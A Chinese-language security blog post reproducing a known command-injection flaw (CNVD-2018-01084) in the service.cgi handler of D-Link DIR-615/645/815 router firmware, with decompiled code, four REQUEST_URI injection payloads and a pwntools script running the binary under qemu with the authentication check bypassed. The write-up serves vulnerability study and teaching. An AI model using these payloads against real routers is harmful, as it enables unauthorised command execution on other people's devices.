<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="Thir0th"><meta name="copyright" content="Thir0th"><meta name="generator" content="Hexo 7.3.0"><meta name="theme" content="hexo-theme-yun"><title>DIR-615—service.cgi命令执行复现 | Thir0th's Blog</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"www.thir0th.xyz","root":"/","title":"且行且忘且随风","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="DIR-615—service.cgi命令执行复现">
<meta property="og:type" content="article">
<meta property="og:title" content="DIR-615—service.cgi命令执行复现">
<meta property="og:url" content="https://www.thir0th.xyz/2025/07/23/2025-07-23-DIR-615_service.cgi/index.html">
<meta property="og:site_name" content="Thir0th&#39;s Blog">
<meta property="og:description" content="DIR-615—service.cgi命令执行复现">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701135339-9m2nf2u.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701135913-d0dahd0.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701140027-o9iihdz.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701140713-9fe5r0q.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701140648-1a4367f.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141054-sns3w3a.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141304-b0f1fvk.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141812-tmbba21.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141848-ufi8j46.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141755-9s87h09.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701142422-zxbjcn0.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701142440-ualsyjd.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701143554-uwebpzt.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701143651-3w00ila.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701143930-muahj51.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701150238-9ksm05t.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701150554-x1wkgj8.png">
<meta property="article:published_time" content="2025-07-23T05:44:00.000Z">
<meta property="article:modified_time" content="2025-07-23T05:52:53.508Z">
<meta property="article:author" content="Thir0th">
<meta property="article:tag" content="IOT">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701135339-9m2nf2u.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="Thir0th"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="Thir0th"><span class="site-author-status" title="人生如戏">🧐</span></a><div class="site-author-name"><a href="/about/">Thir0th</a></div><span class="site-name">Thir0th's Blog</span><sub class="site-subtitle"></sub><div class="site-description">且行且忘且随风</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">3</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">2</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">2</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#D-Link-DIR-615-645-815-service-cgi%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.</span> <span class="toc-text">D-Link DIR 615_645_815 service.cgi远程命令执行漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">2.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text">固件分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%87%BD%E6%95%B0%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">函数流程分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#exp"><span class="toc-number">5.</span> <span class="toc-text">exp</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%9D%E8%80%83"><span class="toc-number">6.</span> <span class="toc-text">思考</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://www.thir0th.xyz/2025/07/23/2025-07-23-DIR-615_service.cgi/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Thir0th"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Thir0th's Blog"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">DIR-615—service.cgi命令执行复现</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2025-07-23 13:44:00" itemprop="dateCreated datePublished" datetime="2025-07-23T13:44:00+08:00">2025-07-23</time></div><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/Router/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">Router</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/IOT/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">IOT</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><span id="more"></span>

<h1 id="D-Link-DIR-615-645-815-service-cgi远程命令执行漏洞"><a href="#D-Link-DIR-615-645-815-service-cgi远程命令执行漏洞" class="headerlink" title="D-Link DIR 615_645_815 service.cgi远程命令执行漏洞"></a>D-Link DIR 615_645_815 service.cgi远程命令执行漏洞</h1><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>漏洞批漏：<a target="_blank" rel="noopener" href="https://www.cnvd.org.cn/flaw/show/CNVD-2018-01084">国家信息安全漏洞共享平台</a></p>
<p>D-Link DIR 615&#x2F;645&#x2F;815路由器1.03及之前的固件版本存在远程命令执行漏洞。该漏洞是由于service.cgi中拼接了HTTP POST请求中的数据，造成后台命令拼接，导致可执行任意命令。</p>
<p>之前分析过hedwig.cgi中存在栈溢出漏洞，命令执行漏洞存在于service.cgi，函数基本逻辑很像</p>
<p>本次复现主要是用的用户级qemu，第一个就是方便调试，第二个就是系统级本人不会启动service服务😊</p>
<h1 id="固件分析"><a href="#固件分析" class="headerlink" title="固件分析"></a>固件分析</h1><p>固件的主要二进制文件就是&#x2F;htdocs&#x2F;cgibin</p>
<p>漏洞点存在于servicecgi_main中，这里接收了第一个参数</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701135339-9m2nf2u.png" alt="image" loading="lazy"></p>
<p>这里先看漏洞点，以及注入点</p>
<p>sub_40A1C0,是解析函数，解析传参的内容，返回参数后第四位v3[3]</p>
<p>例：传入EVENT&#x3D;abc;，会将abc返回给v5</p>
<p>然后会作为%s的值，拼接在event_%__<em>dev_null中也就是后续执行lxmldbc_system(event</em>%s____dev_null)的参数</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701135913-d0dahd0.png" alt="image" loading="lazy"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701140027-o9iihdz.png" alt="image" loading="lazy"></p>
<p>用xrefs查看函数调用可以发现</p>
<p>lxmldbc_system后续会调用system</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701140713-9fe5r0q.png" alt="image" loading="lazy"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701140648-1a4367f.png" alt="image" loading="lazy"></p>
<p>知道注入点以及如何利用，接下来我们仅需让函数走完就行</p>
<h1 id="函数流程分析"><a href="#函数流程分析" class="headerlink" title="函数流程分析"></a>函数流程分析</h1><p>首先就是传参方式，如果是get传参，则会直接报错退出，所以必须是post传参</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141054-sns3w3a.png" alt="image" loading="lazy"></p>
<p>然后就是cgibin_parse_request这个返回值需要大于0，这也是我们要解决的第一个点，当时分析hedwig.cgi栈溢出漏洞时，就曾详细分析过这个函数，主要功能以及流程都是一样的，没有什么太大的差异，猜测最后就是返回sub_40A63C,实际上也就是这样</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141304-b0f1fvk.png" alt="image" loading="lazy"></p>
<p>三个参数，前两个随便写就行，但要注意一些字符不可少，后续的拆分什么的,例如？，&amp;，&#x3D;什么的第三个REQUEST_URI，是payload函数，这里具体判断还是需要去看汇编，查看函数调用，后续的sub_40A1C0(“EVENT”),从哪个变量中取值的，其实也可以说是经验之谈或者去猜，这里对REQUEST_URI的参数进行检测拼接处理，很明显他就是注入点</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141812-tmbba21.png" alt="image" loading="lazy"></p>
<p>n38在？后边</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141848-ufi8j46.png" alt="image" loading="lazy"></p>
<p>CONTENT_TYPE有比较，跟栈溢出漏洞一样，设定为application&#x2F;x-www-form-urlencoded即可，这里返回地址可以动态调试走一下</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701141755-9s87h09.png" alt="image" loading="lazy"></p>
<p>还是返回的403b10</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701142422-zxbjcn0.png" alt="image" loading="lazy"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701142440-ualsyjd.png" alt="image" loading="lazy"></p>
<p>参考上次栈溢出的思路，猜测这里能不能不这样走，但直接out了，因为函数会返回-1，然后就没办法命令执行了</p>
<p>第二个点就是sess_ispoweruser函数，他会检测cookie，就是一个用户验证，用户态的话是没有一些配置文件的，系统态的话应该可以，这里可以参考别的师傅，是将他nop了，同时也可以gdb直接set跳过这一步</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701143554-uwebpzt.png" alt="image" loading="lazy"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701143651-3w00ila.png" alt="image" loading="lazy"></p>
<p>断点下在0x40A3A4,然后去set，之后就可以走到我们的利用点，问题就在于如何构造payload</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701143930-muahj51.png" alt="image" loading="lazy"></p>
<p>只要可以去执行system，我们就可以用’;cmd;去拼接执行命令，需要去理清这段函数的逻辑</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">v5 = sub_40A1C0(&quot;EVENT&quot;);</span><br><span class="line">v7 = (const char *)sub_40A1C0(&quot;ACTION&quot;);</span><br><span class="line">v6 = sub_40A1C0(&quot;SERVICE&quot;);</span><br><span class="line">if ( v5 )</span><br><span class="line">&#123;</span><br><span class="line">  event_%s____dev_null = &quot;event %s &gt; /dev/null&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">  if ( !v6 || !v7 )</span><br><span class="line">    goto LABEL_27;</span><br><span class="line">  if ( !strcasecmp(v7, &quot;START&quot;) )</span><br><span class="line">  &#123;</span><br><span class="line">    event_%s____dev_null = &quot;service %s start &gt; /dev/null&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">  else if ( !strcasecmp(v7, &quot;STOP&quot;) )</span><br><span class="line">  &#123;</span><br><span class="line">    event_%s____dev_null = &quot;service %s stop &gt; /dev/null&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">  else</span><br><span class="line">  &#123;</span><br><span class="line">    if ( strcasecmp(v7, &quot;RESTART&quot;) )</span><br><span class="line">    &#123;</span><br><span class="line">      snprintf(s, 0x100u, &quot;Unknown action - &#x27;%s&#x27;&quot;, v7);</span><br><span class="line">      goto LABEL_10;</span><br><span class="line">    &#125;</span><br><span class="line">    event_%s____dev_null = &quot;service %s restart &gt; /dev/null&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">lxmldbc_system(event_%s____dev_null);</span><br></pre></td></tr></table></figure>

<p>第一种情况加上EVENT，v5!&#x3D;Null，然后直接去执行v5，</p>
<p>另一种SERVICE(加上ACTION字段)，v5&#x3D;Null,然后程序会进入else，判断v6&#x3D;Null || v7&#x3D;Null,如果有一个是空，则程序报错，两者都不能是空，然后就有三条路可以走，最后都可以去注入命令执行，让v7&#x3D;START，RESTART，STOP，会将v6拼接进去</p>
<p>通过函数流程图，我们可以发现四种路径可以调用lxmldbc_system，也就对应我们四种payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">REQUEST_URI=&quot;123?EVENT=;&#123;cmd&#125;;&amp;abc&quot;</span><br><span class="line">REQUEST_URI=&quot;123?ACTION=STOP&amp;SERVICE=;&#123;cmd&#125;;&quot;</span><br><span class="line">REQUEST_URI=&quot;123?ACTION=START&amp;SERVICE=;ls;&quot;</span><br><span class="line">REQUEST_URI=&quot;123?ACTION=RESTART&amp;SERVICE=;ls;&quot; </span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701150238-9ksm05t.png" alt="image" loading="lazy"></p>
<h1 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h1><p>注：需要手动修改绕过用户认证</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line">context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;--&#x27;, &#x27;bash&#x27;, &#x27;-c&#x27;]</span><br><span class="line">context.arch=&#x27;mips&#x27;</span><br><span class="line">context.os=&#x27;linux&#x27;</span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line">def bug():</span><br><span class="line">    gdb.attach(target=(&quot;localhost&quot;, 6666), exe=&quot;./htdocs/cgibin&quot;,</span><br><span class="line">               gdbscript=&quot;&quot;&quot;</span><br><span class="line">               b *0x40A3A4\n    </span><br><span class="line">               c\n</span><br><span class="line">               &quot;&quot;&quot;)</span><br><span class="line">    pause()</span><br><span class="line">def s(a):</span><br><span class="line">	p.send(a)</span><br><span class="line">def sa(a,b):</span><br><span class="line">	p.sendafter(a,b)</span><br><span class="line">def sl(a):</span><br><span class="line">	p.sendline(a)</span><br><span class="line">def sla(a,b):</span><br><span class="line">	p.sendlineafter(a,b)</span><br><span class="line">def r(a):</span><br><span class="line">	p.recv(a)</span><br><span class="line">def rl(a):</span><br><span class="line">	return p.recvuntil(a)</span><br><span class="line">def inter():</span><br><span class="line">	p.interactive()</span><br><span class="line"></span><br><span class="line">li = lambda x : print(&#x27;\x1b[01;38;5;214m&#x27; + x + &#x27;\x1b[0m&#x27;)</span><br><span class="line">ll = lambda x : print(&#x27;\x1b[01;38;5;1m&#x27; + x + &#x27;\x1b[0m&#x27;)</span><br><span class="line"></span><br><span class="line">print(&quot;-------CNVD-2018-01084--------&quot;)</span><br><span class="line">cmd=input(&quot;command:&quot;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">post_content = &quot;Thir0th=AGRiot&quot;</span><br><span class="line">p = process(f&#x27;&#x27;&#x27;</span><br><span class="line">qemu-mipsel -L . \</span><br><span class="line">    -0 &quot;service.cgi&quot; \</span><br><span class="line">    -E REQUEST_METHOD=&quot;POST&quot; \</span><br><span class="line">    -E REQUEST_URI=&quot;123?EVENT=;&#123;cmd&#125;;&amp;abc&quot; \</span><br><span class="line">    -E CONTENT_LENGTH=14 \</span><br><span class="line">    -E CONTENT_TYPE=&quot;application/x-www-form-urlencoded&quot; \</span><br><span class="line">    -g 6666 \</span><br><span class="line">    ./htdocs/cgibin</span><br><span class="line"></span><br><span class="line">&#x27;&#x27;&#x27;,shell=True)</span><br><span class="line">bug()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.send(post_content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#x27;&#x27;&#x27;</span><br><span class="line">REQUEST_URI=&quot;123?ACTION=STOP&amp;SERVICE=;&#123;cmd&#125;;&quot;</span><br><span class="line">REQUEST_URI=&quot;123?ACTION=START&amp;SERVICE=;ls;&quot;</span><br><span class="line">REQUEST_URI=&quot;123?ACTION=RESTART&amp;SERVICE=;ls;&quot; </span><br><span class="line">&#x27;&#x27;&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">inter()	</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>成功执行命令</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250701150554-x1wkgj8.png" alt="image" loading="lazy"></p>
<h1 id="思考"><a href="#思考" class="headerlink" title="思考"></a>思考</h1><p>Dlink真是一个筛子啊，全都是漏洞，但每个服务功能函数基本相同，挖洞时要注意关键函数，system这些危险函数</p>
<p>认识到了看ida函数流程图的作用+xref的强大功能，后续挖掘都可以利用到</p>
<p>多尝试去猜+调试，对哪个变量参数有解析一般就是设置payload的参数</p>
<p>参考链接</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/yalecaltech/article/details/117299537">DIR-645远程命令执行漏洞_d-link dir-645 wired wireless router操作系统命令注入漏洞攻击-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/6129">D-Link service.cgi远程命令执行漏洞分析-先知社区</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/18275">D-Link DIR 615&#x2F;645&#x2F;815 service.cgi远程命令执行漏洞-先知社区</a></p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">I'm so cute. Please give me money.</div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Thir0th</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://www.thir0th.xyz/2025/07/23/2025-07-23-DIR-615_service.cgi/" title="DIR-615—service.cgi命令执行复现">https://www.thir0th.xyz/2025/07/23/2025-07-23-DIR-615_service.cgi/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2025/09/05/hello-world/" rel="prev" title="Hello World"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">Hello World</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2025/04/19/2025-04-19-TLS%E5%8A%AB%E6%8C%81%E8%BF%87canary/" rel="next" title="TLS劫持过canary"><span class="post-nav-text">TLS劫持过canary</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2025 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> Thir0th</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.3.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>